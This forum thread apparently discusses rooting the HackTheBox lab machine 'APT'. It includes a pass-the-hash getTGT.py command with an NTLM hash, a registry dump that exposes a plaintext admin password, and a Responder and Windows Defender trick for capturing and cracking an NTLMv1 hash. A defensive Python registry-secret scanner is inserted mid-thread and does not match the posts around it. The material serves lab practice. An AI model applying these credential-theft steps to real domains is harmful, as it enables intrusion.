TUTORIAL apt.htb
by ARhOmOuTEd - November 02, 2020 at 04:46 PM
#49
(December 29, 2020 at 10:41 AM)runos Wrote:
(December 02, 2020 at 12:39 AM)joker0x90 Wrote: Assuming apt6.htb is your ipv6 IP of the box

Get a kerberos ticket


getTGT.py HTB.local/[email protected] -hashes e53d87d42adaa3ca32bdb34a876cbffb:e53d87d42adaa3ca32bdb34a876cbffb

export [email protected]


Query the registry using impacket

reg.py -k apt.htb.local query -keyName HKU -s >> regdump.txt
Along the output you find


\Network\
\Software\
\Software\GiganticHostingManagementSystem\
        UserName        REG_SZ  henry.vinson_adm
        PassWord        REG_SZ  G1#[email protected]
\Software\Microsoft\
\Software\Microsoft\Active Setup\
\Software\Microsoft\Active Setup\Installed Components\


Use winrm to log in to APT

Nice, do you know how to priv esc on this machine?

It's about NTLMv1, as you can see in the consolehost_history.txt
Find a way to make a request with LocalSystem to your machine and catch the NTLMv1 request. Then you can crack the NTLMv1.
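A defender-side check for the registry finding above, added here as an example (not code from the thread, from Impacket or from the box): it parses reg.py-style `query -s` output and flags string values whose names look like credentials, so a dump like the one quoted can be audited instead of read by eye. The dump text is a constructed sample modelled on the quoted one, with the password replaced by a placeholder.

```python
import re

# Constructed sample of `reg.py -k <host> query -keyName HKU -s` output, modelled on
# the dump quoted in this thread; the real password value is replaced by a placeholder.
SAMPLE_DUMP = r"""
\Network\
\Software\
\Software\GiganticHostingManagementSystem\
        UserName        REG_SZ  henry.vinson_adm
        PassWord        REG_SZ  PLACEHOLDER-PASSWORD
\Software\Microsoft\
\Software\Microsoft\Active Setup\
"""

# Value names that commonly hold plaintext secrets in application keys.
SECRET_NAME = re.compile(r"pass(word|wd)?|pwd|secret|token|apikey", re.IGNORECASE)

def parse_reg_dump(text):
    """Turn reg.py-style output into (key, name, type, data) tuples.
    Key lines start with a backslash; value lines are indented and hold name,
    type and data separated by whitespace (data may contain spaces: maxsplit=2)."""
    entries, current_key = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith((" ", "\t")):       # a key path line
            current_key = line.strip()
            continue
        parts = line.split(None, 2)                  # name, type, data
        if len(parts) < 2 or current_key is None:
            continue
        data = parts[2] if len(parts) == 3 else ""
        entries.append((current_key, parts[0], parts[1], data))
    return entries


def find_stored_secrets(entries):
    """Flag string values whose name looks like a credential, paired with the
    UserName stored in the same key so the finding is actionable."""
    by_key = {}
    for key, name, vtype, data in entries:
        by_key.setdefault(key, {})[name] = (vtype, data)
    findings = []
    for key, values in by_key.items():
        for name, (vtype, data) in values.items():
            if vtype in ("REG_SZ", "REG_EXPAND_SZ") and data and SECRET_NAME.search(name):
                findings.append({"key": key, "value": name,
                                 "user": values.get("UserName", ("", ""))[1]})
    return findings
```

Running `find_stored_secrets(parse_reg_dump(SAMPLE_DUMP))` reports the GiganticHostingManagementSystem key with its PassWord value and the henry.vinson_adm account stored beside it.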
#50
(December 29, 2020 at 11:43 AM)ARhOmOuTEd Wrote:
(December 29, 2020 at 10:41 AM)runos Wrote:
Nice, do you know how to priv esc on this machine?

It's about NTLMv1, as you can see in the consolehost_history.txt
Find a way to make a request with LocalSystem to your machine and catch the NTLMv1 request. Then you can crack the NTLMv1.

Are there any resources for this I can read up on? I have never made a request to my machine as LocalSystem while being a low-priv user, so I'm not sure about this.
#51
(December 29, 2020 at 12:28 PM)runos Wrote:
(December 29, 2020 at 11:43 AM)ARhOmOuTEd Wrote:
(December 29, 2020 at 10:41 AM)runos Wrote:
Nice, do you know how to priv esc on this machine?

It's about NTLMv1, as you can see in the consolehost_history.txt
Find a way to make a request with LocalSystem to your machine and catch the NTLMv1 request. Then you can crack the NTLMv1.

Are there any resources for this I can read up on? I have never made a request to my machine as LocalSystem while being a low-priv user, so I'm not sure about this.

I don't have any, but you can use Responder (https://tools.kali.org/sniffingspoofing/responder) on your machine and then use Windows Defender on apt.htb to scan a file on your machine. Then it will try to connect to your machine and send the NTLMv1 hash. Next you have to crack the hash, because it's not the normal NTLM hash you can use for a pass-the-hash attack.
#52
(December 29, 2020 at 10:08 PM)ARhOmOuTEd Wrote:
(December 29, 2020 at 12:28 PM)runos Wrote:
(December 29, 2020 at 11:43 AM)ARhOmOuTEd Wrote:
(December 29, 2020 at 10:41 AM)runos Wrote:
Nice, do you know how to priv esc on this machine?

It's about NTLMv1, as you can see in the consolehost_history.txt
Find a way to make a request with LocalSystem to your machine and catch the NTLMv1 request. Then you can crack the NTLMv1.

Are there any resources for this I can read up on? I have never made a request to my machine as LocalSystem while being a low-priv user, so I'm not sure about this.

I don't have any, but you can use Responder (https://tools.kali.org/sniffingspoofing/responder) on your machine and then use Windows Defender on apt.htb to scan a file on your machine. Then it will try to connect to your machine and send the NTLMv1 hash. Next you have to crack the hash, because it's not the normal NTLM hash you can use for a pass-the-hash attack.

Rooted it now, thanks for your help. But this was an unintended solution and there is another, intended way to do it.
#53
(December 29, 2020 at 11:03 PM)runos Wrote:
(December 29, 2020 at 10:08 PM)ARhOmOuTEd Wrote:
(December 29, 2020 at 12:28 PM)runos Wrote:
(December 29, 2020 at 11:43 AM)ARhOmOuTEd Wrote:
(December 29, 2020 at 10:41 AM)runos Wrote: Nice, do you know how to priv esc on this machine?

It's about NTLMv1, as you can see in the consolehost_history.txt
Find a way to make a request with LocalSystem to your machine and catch the NTLMv1 request. Then you can crack the NTLMv1.

Are there any resources for this I can read up on? I have never made a request to my machine as LocalSystem while being a low-priv user, so I'm not sure about this.

I don't have any, but you can use Responder (https://tools.kali.org/sniffingspoofing/responder) on your machine and then use Windows Defender on apt.htb to scan a file on your machine. Then it will try to connect to your machine and send the NTLMv1 hash. Next you have to crack the hash, because it's not the normal NTLM hash you can use for a pass-the-hash attack.

Rooted it now, thanks for your help. But this was an unintended solution and there is another, intended way to do it.

Any hints would be really helpful on priv esc.
#54
Bumping this to get some HTB content on the front page. If anyone has a link to a write-up, that would be frikken amazin.
#55
You fellas, help us out with some hints on the root part, I'm stuck at root.
#56
Trying to keep this on the front page instead of the course leaks which are taking over
#57
SSSSSSSSSSSSSSSSSOMEONE SHARE SOME HINTS ON ROOT
#58
Here are the steps I took to get root in APT. I used the idea posted in one of the threads about this machine, but I could not find it right now, so I cannot give credit. Sorry about that.

I have no idea if this is the intended way, but it was my way. =D


steps4root [Hidden Content]
#59
(January 02, 2021 at 10:58 PM)CaptH00k Wrote: Here are the steps I took to get root in APT. I used the idea posted in one of the threads about this machine, but I could not find it right now, so I cannot give credit. Sorry about that.

I have no idea if this is the intended way, but it was my way. =D


[Hidden Content]

@CaptHOOk - I don't have enough credits, may you kindly share the steps with me?
#60
(January 17, 2021 at 12:29 PM)davedk Wrote:
(January 02, 2021 at 10:58 PM)CaptH00k Wrote: Here are the steps I took to get root in APT. I used the idea posted in one of the threads about this machine, but I could not find it right now, so I cannot give credit. Sorry about that.

I have no idea if this is the intended way, but it was my way. =D


[Hidden Content]

@CaptHOOk - I don't have enough credits, may you kindly share the steps with me?

You can get the credits needed to unlock this for free: just make 4 posts somewhere else on the forum.
